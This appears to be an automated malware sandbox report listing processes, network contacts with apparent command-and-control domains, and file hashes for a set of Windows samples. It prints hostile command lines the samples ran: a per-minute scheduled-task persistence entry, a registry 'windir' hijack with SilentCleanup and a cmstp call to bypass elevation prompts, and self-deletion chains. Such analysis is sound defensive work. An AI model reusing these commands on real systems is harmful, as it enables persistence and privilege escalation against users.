PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

"C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe"

C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe

"C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe"

C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

"C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 756 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\458908152343698\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 756

C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

"C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe"

C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

"C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

"C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe"

C:\Windows\SysWOW64\logagent.exe

C:\Windows\System32\logagent.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\Trast.bat" "

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\nest.bat" "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

"{path}"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3A90.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\udz2b2rb.inf

C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

"{path}"

C:\Windows\system32\taskeng.exe

taskeng.exe {E6E87F1B-80A7-427B-A640-09E5F00EB9D9} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 45.67.231.40:80 45.67.231.40 tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 sergio.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 www.microsoft.com udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 ocsp.verisign.com udp
N/A 23.51.123.27:80 ocsp.verisign.com tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp

Files

memory/684-62-0x0000000075C71000-0x0000000075C73000-memory.dmp

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/2016-65-0x0000000000000000-mapping.dmp

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/2044-72-0x000000000041A684-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/684-74-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2016-76-0x00000000003C0000-0x00000000003C8000-memory.dmp

memory/2016-75-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2044-77-0x0000000000400000-0x0000000000420000-memory.dmp

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/2040-80-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/1732-83-0x000000000044003F-mapping.dmp

memory/2044-86-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1732-87-0x0000000000400000-0x0000000000495000-memory.dmp

memory/1732-88-0x0000000000240000-0x0000000000241000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/2040-101-0x00000000003D0000-0x00000000003D1000-memory.dmp

memory/756-102-0x0000000000417A8B-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/756-105-0x0000000000400000-0x0000000000434000-memory.dmp

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\ProgramData\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\ProgramData\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/1176-112-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

memory/1700-117-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/2000-120-0x0000000000000000-mapping.dmp

memory/1784-121-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/860-124-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/564-126-0x0000000000000000-mapping.dmp

memory/1176-127-0x0000000000910000-0x0000000000911000-memory.dmp

memory/2000-128-0x0000000000B80000-0x0000000000B81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/564-133-0x00000000001C0000-0x00000000001C1000-memory.dmp

\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1480-137-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1620-138-0x0000000000000000-mapping.dmp

memory/948-140-0x0000000000000000-mapping.dmp

memory/1700-141-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1480-142-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1176-145-0x0000000002090000-0x00000000020F6000-memory.dmp

memory/564-143-0x0000000001E20000-0x0000000001E80000-memory.dmp

memory/2000-144-0x00000000005F0000-0x0000000000650000-memory.dmp

memory/1176-147-0x0000000000890000-0x0000000000891000-memory.dmp

memory/564-146-0x0000000000670000-0x0000000000671000-memory.dmp

memory/2000-148-0x0000000004980000-0x0000000004981000-memory.dmp

memory/2000-149-0x00000000004E0000-0x00000000004E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

